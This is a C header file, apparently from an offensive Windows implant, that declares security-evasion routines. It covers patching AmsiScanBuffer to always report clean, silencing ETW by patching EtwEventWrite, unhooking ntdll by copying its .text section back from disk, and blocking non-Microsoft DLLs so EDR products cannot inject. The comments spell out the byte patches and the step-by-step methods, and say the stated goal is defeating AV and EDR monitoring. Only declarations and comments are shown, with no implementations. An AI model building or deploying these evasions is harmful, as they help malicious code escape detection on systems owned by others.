#ifndef EVASION_H
#define EVASION_H

#include "logger.h"
#include <windows.h>

// ── In-Process Memory Patches ─────────────────────────────────────────────────

// Patch AmsiScanBuffer in amsi.dll to always return AMSI_RESULT_CLEAN.
// Overwrites the function prologue with `xor eax, eax; ret` (3 bytes, x64).
// Call before loading any content that triggers AMSI scanning (.NET assemblies,
// PowerShell scripts, etc.).
// @return: 0 on success, -1 on failure (amsi.dll not loaded, or patch failed)
int patch_amsi(void);

// Patch EtwEventWrite in ntdll to a bare `ret`, suppressing all ETW events
// generated by this process. Effective against EDR products that rely on
// ETW-TI (Threat Intelligence) feeds from the kernel.
// @return: 0 on success, -1 on failure
int patch_etw(void);

// Reload ntdll.dll from disk and overwrite its .text section in the current
// process's address space, restoring any inline hooks placed by EDR/AV.
//
// Technique:
//   1. Open ntdll.dll on disk and map it with SEC_IMAGE (same layout as loader)
//   2. Walk PE section headers to locate .text
//   3. VirtualProtect .text to PAGE_EXECUTE_READWRITE
//   4. memcpy from the clean file mapping
//   5. Restore original protection and FlushInstructionCache
//
// This invalidates userland hooks from most commercial EDR products.
// Does NOT affect kernel callbacks (PsSetCreateProcessNotifyRoutine, etc.).
// @return: 0 on success, -1 on failure
int unhook_ntdll(void);

// ── Kernel MitigationOptions Registry Policy ─────────────────────────────────

// Write HKLM\...\kernel\MitigationOptions to enforce Microsoft-signed-only
// kernel module loading (byte 5 = 0x10). Requires administrator privileges.
// Reads and logs the current value before writing, then verifies after.
// @return: 0 on success, -1 on failure
int set_mitigation_policy(void);

// Reset HKLM\...\kernel\MitigationOptions to the Windows default
// (Windows-signed/WHQL level, byte 5 = 0x20). No-op if the value is absent.
// @return: 0 on success, -1 on failure
int unset_mitigation_policy(void);

// ── Process-Level Mitigation Policy ──────────────────────────────────────────

// Apply PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY (MicrosoftSignedOnly) to
// the current process via SetProcessMitigationPolicy.
//
// Once set this cannot be removed — it applies for the lifetime of the process.
// Effect: the kernel will refuse to load any DLL not signed by Microsoft,
// preventing EDR/AV products from injecting their monitoring hooks into this
// process.
//
// Note: any DLL already loaded is unaffected. Call this early (before any
// third-party DLL is mapped) for maximum effect.
//
// Requires Windows 8+. Returns -1 on older systems or if the API is unavailable.
// @return: 0 on success, -1 on failure
int enable_blockdlls(void);

#endif // EVASION_H
